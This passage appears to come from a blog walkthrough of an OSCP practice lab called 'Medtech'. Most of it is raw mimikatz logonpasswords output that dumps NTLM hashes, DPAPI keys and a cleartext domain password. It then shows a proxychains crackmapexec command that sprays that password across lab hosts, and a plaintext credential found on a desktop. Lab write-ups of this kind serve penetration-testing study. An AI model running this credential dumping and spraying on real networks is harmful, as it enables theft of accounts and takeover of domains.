81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 4536956 (00000000:00453a7c)
Session : RemoteInteractive from 2
User Name : yoshi
Domain : MEDTECH
Logon Server : DC01
Logon Time : 10/31/2023 2:27:00 AM
SID : S-1-5-21-976142013-3766213998-138799841-1110
msv :
[00000003] Primary
* Username : yoshi
* Domain : MEDTECH
* NTLM : fdf36048c1cf88f5630381c5e38feb8e
* SHA1 : 46d778aa60c13155094d085faef70a1f92442773
* DPAPI : 3428d1f5289eb8cbec90bd5f761f4666
tspkg :
wdigest :
* Username : yoshi
* Domain : MEDTECH
* Password : (null)
kerberos :
* Username : yoshi
* Domain : MEDTECH.COM
* Password : (null)
ssp :
credman :
cloudap :
Authentication Id : 0 ; 4502784 (00000000:0044b500)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 10/31/2023 2:26:59 AM
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : DEV04$
* Domain : MEDTECH
* NTLM : 1a8a7101a5ac64026be6b17a9f814176
* SHA1 : 65f787c2ade635cb08cc1d852637f240c0236e5f
tspkg :
wdigest :
* Username : DEV04$
* Domain : MEDTECH
* Password : (null)
kerberos :
* Username : DEV04$
* Domain : medtech.com
* Password : 00 ce dd 2d df d7 f4 09 31 da f0 d2 86 7c 04 42 2c 33 e2 5a 02 b9 0c 5b 56 86 c0 12 b9 59 c2 ab f9 d1 dc 66 e0 09 b3 fe 8c 58 00 7a 6e 29 b2 e9 e8 a0 2c b5 c2 61 b9 11 6b 80 dd b0 8e bf 68 f9 02 d8 eb 1d 30 34 fd 57 e5 e5 f4 a7 b1 35 6b a4 7c b5 d5 95 0c 02 4e 5d 0e 1b 0f d5 98 17 e2 4f f5 76 84 d9 0d 9a 81 ce 02 f3 6a 4f 3d bb b0 f1 0d 14 4b 95 64 78 f8 47 8b 06 1c c7 fa ea c0 a9 37 ad 16 de b3 f3 7c 6f 0b 05 09 c4 3b 46 93 96 49 5a 73 35 a3 09 22 68 35 7f 2a 05 47 ce 74 78 5d 0e 00 1f f1 1e 40 a9 69 7c 2d 63 d0 90 7c 0f 57 7e 0e bb d3 55 cc bc d6 08 c5 39 13 14 69 8b 9a 51 3a ae 40 d8 65 a8 76 45 41 4f ed 9e 26 0f 2e 87 ea 12 3f d0 61 f5 06 d4 c8 0c 0a 79 1d e6 af e0 ea b5 d8 c4 41 8a b1 cf ac bb 83 ef 9a 23
ssp :
credman :
cloudap :
Authentication Id : 0 ; 393656 (00000000:000601b8)
Session : Interactive from 1
User Name : leon
Domain : MEDTECH
Logon Server : DC01
Logon Time : 7/11/2023 5:34:08 AM
SID : S-1-5-21-976142013-3766213998-138799841-1105
msv :
[00000003] Primary
* Username : leon
* Domain : MEDTECH
* NTLM : 2e208ad146efda5bc44869025e06544a
* SHA1 : 8d1c9e13d2d2c20dbee8b4eacb20b73f06573c96
* DPAPI : a7bad14f64c3cf0d7ae2b5f6392a0b6d
tspkg :
wdigest :
* Username : leon
* Domain : MEDTECH
* Password : (null)
kerberos :
* Username : leon
* Domain : MEDTECH.COM
* Password : (null)
ssp :
credman :
cloudap :
Authentication Id : 0 ; 73115 (00000000:00011d9b)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 7/11/2023 5:33:43 AM
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : DEV04$
* Domain : MEDTECH
* NTLM : 67fde543d7569ef3fd265e13c9a5a180
* SHA1 : 3a64719b89867334fb51febe96e1e47187619050
tspkg :
wdigest :
* Username : DEV04$
* Domain : MEDTECH
* Password : (null)
kerberos :
* Username : DEV04$
* Domain : medtech.com
* Password : 27 93 22 6e 7f c1 1b dc 2d 10 21 d1 ec c6 d0 e9 fa a0 23 30 24 8a 68 d2 8d 65 fb 5b f0 2a cd b4 0d 2b 3c cd 2f 55 45 aa 27 86 7c 0f 92 28 d7 4c 57 f9 b3 c0 07 b6 27 db 48 56 50 46 9b dc 81 50 09 5c 10 c3 2c 0a 26 81 d0 29 03 18 5f 01 26 55 a9 09 94 d2 ef 31 9a 77 6e a4 28 a5 83 eb 2a 41 47 b7 2a fa e6 2a 54 ee 60 4e 0a d2 69 4b c9 fd 7f e3 94 37 07 87 ea 85 9c f9 5f e7 f0 fe 1d b8 e2 55 8b f4 fb 01 b0 9c 12 4a 81 bf 5d 5b 2a 66 c4 a0 21 6d 73 08 38 3a 0b 67 29 24 fa 0d 31 86 b8 69 cd 43 0c a3 d3 d3 25 51 9f 72 20 6c 58 47 4b 8e 83 c4 e0 5b d2 ed fb a2 6b 1f 09 c5 69 f3 f3 21 1e f0 32 5b 2e 13 6a e3 c3 ab 1e a2 9c 73 03 2c ba 4a d8 05 f0 f1 9c ff 3d 0a c3 93 96 b4 19 09 5e b3 6d 69 dd b3 4f 9c 2f 0a e7 f9 f1 6b
ssp :
credman :
cloudap :
Authentication Id : 0 ; 73097 (00000000:00011d89)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 7/11/2023 5:33:43 AM
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : DEV04$
* Domain : MEDTECH
* NTLM : 1a8a7101a5ac64026be6b17a9f814176
* SHA1 : 65f787c2ade635cb08cc1d852637f240c0236e5f
tspkg :
wdigest :
* Username : DEV04$
* Domain : MEDTECH
* Password : (null)
kerberos :
* Username : DEV04$
* Domain : medtech.com
* Password : 00 ce dd 2d df d7 f4 09 31 da f0 d2 86 7c 04 42 2c 33 e2 5a 02 b9 0c 5b 56 86 c0 12 b9 59 c2 ab f9 d1 dc 66 e0 09 b3 fe 8c 58 00 7a 6e 29 b2 e9 e8 a0 2c b5 c2 61 b9 11 6b 80 dd b0 8e bf 68 f9 02 d8 eb 1d 30 34 fd 57 e5 e5 f4 a7 b1 35 6b a4 7c b5 d5 95 0c 02 4e 5d 0e 1b 0f d5 98 17 e2 4f f5 76 84 d9 0d 9a 81 ce 02 f3 6a 4f 3d bb b0 f1 0d 14 4b 95 64 78 f8 47 8b 06 1c c7 fa ea c0 a9 37 ad 16 de b3 f3 7c 6f 0b 05 09 c4 3b 46 93 96 49 5a 73 35 a3 09 22 68 35 7f 2a 05 47 ce 74 78 5d 0e 00 1f f1 1e 40 a9 69 7c 2d 63 d0 90 7c 0f 57 7e 0e bb d3 55 cc bc d6 08 c5 39 13 14 69 8b 9a 51 3a ae 40 d8 65 a8 76 45 41 4f ed 9e 26 0f 2e 87 ea 12 3f d0 61 f5 06 d4 c8 0c 0a 79 1d e6 af e0 ea b5 d8 c4 41 8a b1 cf ac bb 83 ef 9a 23
ssp :
credman :
cloudap :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : DEV04$
Domain : MEDTECH
Logon Server : (null)
Logon Time : 7/11/2023 5:33:43 AM
SID : S-1-5-20
msv :
[00000003] Primary
* Username : DEV04$
* Domain : MEDTECH
* NTLM : 1a8a7101a5ac64026be6b17a9f814176
* SHA1 : 65f787c2ade635cb08cc1d852637f240c0236e5f
tspkg :
wdigest :
* Username : DEV04$
* Domain : MEDTECH
* Password : (null)
kerberos :
* Username : dev04$
* Domain : MEDTECH.COM
* Password : 00 ce dd 2d df d7 f4 09 31 da f0 d2 86 7c 04 42 2c 33 e2 5a 02 b9 0c 5b 56 86 c0 12 b9 59 c2 ab f9 d1 dc 66 e0 09 b3 fe 8c 58 00 7a 6e 29 b2 e9 e8 a0 2c b5 c2 61 b9 11 6b 80 dd b0 8e bf 68 f9 02 d8 eb 1d 30 34 fd 57 e5 e5 f4 a7 b1 35 6b a4 7c b5 d5 95 0c 02 4e 5d 0e 1b 0f d5 98 17 e2 4f f5 76 84 d9 0d 9a 81 ce 02 f3 6a 4f 3d bb b0 f1 0d 14 4b 95 64 78 f8 47 8b 06 1c c7 fa ea c0 a9 37 ad 16 de b3 f3 7c 6f 0b 05 09 c4 3b 46 93 96 49 5a 73 35 a3 09 22 68 35 7f 2a 05 47 ce 74 78 5d 0e 00 1f f1 1e 40 a9 69 7c 2d 63 d0 90 7c 0f 57 7e 0e bb d3 55 cc bc d6 08 c5 39 13 14 69 8b 9a 51 3a ae 40 d8 65 a8 76 45 41 4f ed 9e 26 0f 2e 87 ea 12 3f d0 61 f5 06 d4 c8 0c 0a 79 1d e6 af e0 ea b5 d8 c4 41 8a b1 cf ac bb 83 ef 9a 23
ssp :
credman :
cloudap :
Authentication Id : 0 ; 42882 (00000000:0000a782)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 7/11/2023 5:33:43 AM
SID : S-1-5-96-0-0
msv :
[00000003] Primary
* Username : DEV04$
* Domain : MEDTECH
* NTLM : 1a8a7101a5ac64026be6b17a9f814176
* SHA1 : 65f787c2ade635cb08cc1d852637f240c0236e5f
tspkg :
wdigest :
* Username : DEV04$
* Domain : MEDTECH
* Password : (null)
kerberos :
* Username : DEV04$
* Domain : medtech.com
* Password : 00 ce dd 2d df d7 f4 09 31 da f0 d2 86 7c 04 42 2c 33 e2 5a 02 b9 0c 5b 56 86 c0 12 b9 59 c2 ab f9 d1 dc 66 e0 09 b3 fe 8c 58 00 7a 6e 29 b2 e9 e8 a0 2c b5 c2 61 b9 11 6b 80 dd b0 8e bf 68 f9 02 d8 eb 1d 30 34 fd 57 e5 e5 f4 a7 b1 35 6b a4 7c b5 d5 95 0c 02 4e 5d 0e 1b 0f d5 98 17 e2 4f f5 76 84 d9 0d 9a 81 ce 02 f3 6a 4f 3d bb b0 f1 0d 14 4b 95 64 78 f8 47 8b 06 1c c7 fa ea c0 a9 37 ad 16 de b3 f3 7c 6f 0b 05 09 c4 3b 46 93 96 49 5a 73 35 a3 09 22 68 35 7f 2a 05 47 ce 74 78 5d 0e 00 1f f1 1e 40 a9 69 7c 2d 63 d0 90 7c 0f 57 7e 0e bb d3 55 cc bc d6 08 c5 39 13 14 69 8b 9a 51 3a ae 40 d8 65 a8 76 45 41 4f ed 9e 26 0f 2e 87 ea 12 3f d0 61 f5 06 d4 c8 0c 0a 79 1d e6 af e0 ea b5 d8 c4 41 8a b1 cf ac bb 83 ef 9a 23
ssp :
credman :
cloudap :
Authentication Id : 0 ; 42860 (00000000:0000a76c)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 7/11/2023 5:33:43 AM
SID : S-1-5-96-0-1
msv :
[00000003] Primary
* Username : DEV04$
* Domain : MEDTECH
* NTLM : 1a8a7101a5ac64026be6b17a9f814176
* SHA1 : 65f787c2ade635cb08cc1d852637f240c0236e5f
tspkg :
wdigest :
* Username : DEV04$
* Domain : MEDTECH
* Password : (null)
kerberos :
* Username : DEV04$
* Domain : medtech.com
* Password : 00 ce dd 2d df d7 f4 09 31 da f0 d2 86 7c 04 42 2c 33 e2 5a 02 b9 0c 5b 56 86 c0 12 b9 59 c2 ab f9 d1 dc 66 e0 09 b3 fe 8c 58 00 7a 6e 29 b2 e9 e8 a0 2c b5 c2 61 b9 11 6b 80 dd b0 8e bf 68 f9 02 d8 eb 1d 30 34 fd 57 e5 e5 f4 a7 b1 35 6b a4 7c b5 d5 95 0c 02 4e 5d 0e 1b 0f d5 98 17 e2 4f f5 76 84 d9 0d 9a 81 ce 02 f3 6a 4f 3d bb b0 f1 0d 14 4b 95 64 78 f8 47 8b 06 1c c7 fa ea c0 a9 37 ad 16 de b3 f3 7c 6f 0b 05 09 c4 3b 46 93 96 49 5a 73 35 a3 09 22 68 35 7f 2a 05 47 ce 74 78 5d 0e 00 1f f1 1e 40 a9 69 7c 2d 63 d0 90 7c 0f 57 7e 0e bb d3 55 cc bc d6 08 c5 39 13 14 69 8b 9a 51 3a ae 40 d8 65 a8 76 45 41 4f ed 9e 26 0f 2e 87 ea 12 3f d0 61 f5 06 d4 c8 0c 0a 79 1d e6 af e0 ea b5 d8 c4 41 8a b1 cf ac bb 83 ef 9a 23
ssp :
credman :
cloudap :
Authentication Id : 0 ; 4503230 (00000000:0044b6be)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 10/31/2023 2:26:59 AM
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : DEV04$
* Domain : MEDTECH
* NTLM : 1a8a7101a5ac64026be6b17a9f814176
* SHA1 : 65f787c2ade635cb08cc1d852637f240c0236e5f
tspkg :
wdigest :
* Username : DEV04$
* Domain : MEDTECH
* Password : (null)
kerberos :
* Username : DEV04$
* Domain : medtech.com
* Password : 00 ce dd 2d df d7 f4 09 31 da f0 d2 86 7c 04 42 2c 33 e2 5a 02 b9 0c 5b 56 86 c0 12 b9 59 c2 ab f9 d1 dc 66 e0 09 b3 fe 8c 58 00 7a 6e 29 b2 e9 e8 a0 2c b5 c2 61 b9 11 6b 80 dd b0 8e bf 68 f9 02 d8 eb 1d 30 34 fd 57 e5 e5 f4 a7 b1 35 6b a4 7c b5 d5 95 0c 02 4e 5d 0e 1b 0f d5 98 17 e2 4f f5 76 84 d9 0d 9a 81 ce 02 f3 6a 4f 3d bb b0 f1 0d 14 4b 95 64 78 f8 47 8b 06 1c c7 fa ea c0 a9 37 ad 16 de b3 f3 7c 6f 0b 05 09 c4 3b 46 93 96 49 5a 73 35 a3 09 22 68 35 7f 2a 05 47 ce 74 78 5d 0e 00 1f f1 1e 40 a9 69 7c 2d 63 d0 90 7c 0f 57 7e 0e bb d3 55 cc bc d6 08 c5 39 13 14 69 8b 9a 51 3a ae 40 d8 65 a8 76 45 41 4f ed 9e 26 0f 2e 87 ea 12 3f d0 61 f5 06 d4 c8 0c 0a 79 1d e6 af e0 ea b5 d8 c4 41 8a b1 cf ac bb 83 ef 9a 23
ssp :
credman :
cloudap :
Authentication Id : 0 ; 4502013 (00000000:0044b1fd)
Session : Interactive from 2
User Name : UMFD-2
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 10/31/2023 2:26:59 AM
SID : S-1-5-96-0-2
msv :
[00000003] Primary
* Username : DEV04$
* Domain : MEDTECH
* NTLM : 1a8a7101a5ac64026be6b17a9f814176
* SHA1 : 65f787c2ade635cb08cc1d852637f240c0236e5f
tspkg :
wdigest :
* Username : DEV04$
* Domain : MEDTECH
* Password : (null)
kerberos :
* Username : DEV04$
* Domain : medtech.com
* Password : 00 ce dd 2d df d7 f4 09 31 da f0 d2 86 7c 04 42 2c 33 e2 5a 02 b9 0c 5b 56 86 c0 12 b9 59 c2 ab f9 d1 dc 66 e0 09 b3 fe 8c 58 00 7a 6e 29 b2 e9 e8 a0 2c b5 c2 61 b9 11 6b 80 dd b0 8e bf 68 f9 02 d8 eb 1d 30 34 fd 57 e5 e5 f4 a7 b1 35 6b a4 7c b5 d5 95 0c 02 4e 5d 0e 1b 0f d5 98 17 e2 4f f5 76 84 d9 0d 9a 81 ce 02 f3 6a 4f 3d bb b0 f1 0d 14 4b 95 64 78 f8 47 8b 06 1c c7 fa ea c0 a9 37 ad 16 de b3 f3 7c 6f 0b 05 09 c4 3b 46 93 96 49 5a 73 35 a3 09 22 68 35 7f 2a 05 47 ce 74 78 5d 0e 00 1f f1 1e 40 a9 69 7c 2d 63 d0 90 7c 0f 57 7e 0e bb d3 55 cc bc d6 08 c5 39 13 14 69 8b 9a 51 3a ae 40 d8 65 a8 76 45 41 4f ed 9e 26 0f 2e 87 ea 12 3f d0 61 f5 06 d4 c8 0c 0a 79 1d e6 af e0 ea b5 d8 c4 41 8a b1 cf ac bb 83 ef 9a 23
ssp :
credman :
cloudap :
Authentication Id : 0 ; 394223 (00000000:000603ef)
Session : Interactive from 1
User Name : leon
Domain : MEDTECH
Logon Server : DC01
Logon Time : 7/11/2023 5:34:08 AM
SID : S-1-5-21-976142013-3766213998-138799841-1105
msv :
[00000003] Primary
* Username : leon
* Domain : MEDTECH
* NTLM : 2e208ad146efda5bc44869025e06544a
* SHA1 : 8d1c9e13d2d2c20dbee8b4eacb20b73f06573c96
* DPAPI : a7bad14f64c3cf0d7ae2b5f6392a0b6d
tspkg :
wdigest :
* Username : leon
* Domain : MEDTECH
* Password : (null)
kerberos :
* Username : leon
* Domain : MEDTECH.COM
* Password : rabbit:)
ssp :
credman :
cloudap :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 7/11/2023 5:33:44 AM
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
cloudap :
Authentication Id : 0 ; 41731 (00000000:0000a303)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 7/11/2023 5:33:43 AM
SID :
msv :
[00000003] Primary
* Username : DEV04$
* Domain : MEDTECH
* NTLM : 1a8a7101a5ac64026be6b17a9f814176
* SHA1 : 65f787c2ade635cb08cc1d852637f240c0236e5f
tspkg :
wdigest :
kerberos :
ssp :
credman :
cloudap :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : DEV04$
Domain : MEDTECH
Logon Server : (null)
Logon Time : 7/11/2023 5:33:43 AM
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : DEV04$
* Domain : MEDTECH
* Password : (null)
kerberos :
* Username : dev04$
* Domain : MEDTECH.COM
* Password : 00 ce dd 2d df d7 f4 09 31 da f0 d2 86 7c 04 42 2c 33 e2 5a 02 b9 0c 5b 56 86 c0 12 b9 59 c2 ab f9 d1 dc 66 e0 09 b3 fe 8c 58 00 7a 6e 29 b2 e9 e8 a0 2c b5 c2 61 b9 11 6b 80 dd b0 8e bf 68 f9 02 d8 eb 1d 30 34 fd 57 e5 e5 f4 a7 b1 35 6b a4 7c b5 d5 95 0c 02 4e 5d 0e 1b 0f d5 98 17 e2 4f f5 76 84 d9 0d 9a 81 ce 02 f3 6a 4f 3d bb b0 f1 0d 14 4b 95 64 78 f8 47 8b 06 1c c7 fa ea c0 a9 37 ad 16 de b3 f3 7c 6f 0b 05 09 c4 3b 46 93 96 49 5a 73 35 a3 09 22 68 35 7f 2a 05 47 ce 74 78 5d 0e 00 1f f1 1e 40 a9 69 7c 2d 63 d0 90 7c 0f 57 7e 0e bb d3 55 cc bc d6 08 c5 39 13 14 69 8b 9a 51 3a ae 40 d8 65 a8 76 45 41 4f ed 9e 26 0f 2e 87 ea 12 3f d0 61 f5 06 d4 c8 0c 0a 79 1d e6 af e0 ea b5 d8 c4 41 8a b1 cf ac bb 83 ef 9a 23
ssp :
credman :
cloudap :找到一個新cred
1
2
3* Username : leon
* Domain : MEDTECH.COM
* Password : rabbit:)cme
1
2
3
4
5
6
7
8
9proxychains4 -q crackmapexec smb result.txt -u leon -p 'rabbit:)'
SMB 172.16.218.10 445 DC01 [+] medtech.com\leon:rabbit:) (Pwn3d!)
SMB 172.16.218.13 445 PROD01 [+] medtech.com\leon:rabbit:) (Pwn3d!)
SMB 172.16.218.11 445 FILES02 [+] medtech.com\leon:rabbit:) (Pwn3d!)
SMB 172.16.218.83 445 CLIENT02 [+] medtech.com\leon:rabbit:) (Pwn3d!)
SMB 172.16.218.12 445 DEV04 [+] medtech.com\leon:rabbit:) (Pwn3d!)
SMB 172.16.218.82 445 CLIENT01 [+] medtech.com\leon:rabbit:) (Pwn3d!)
172.16.218.10 (DC01)
1 |
|
- 在desktop找到cred
1
web01: offsec/century62hisan51
OSCP-Medtech
https://luoming1995125.github.io/2023/11/01/OSCP-Medtech/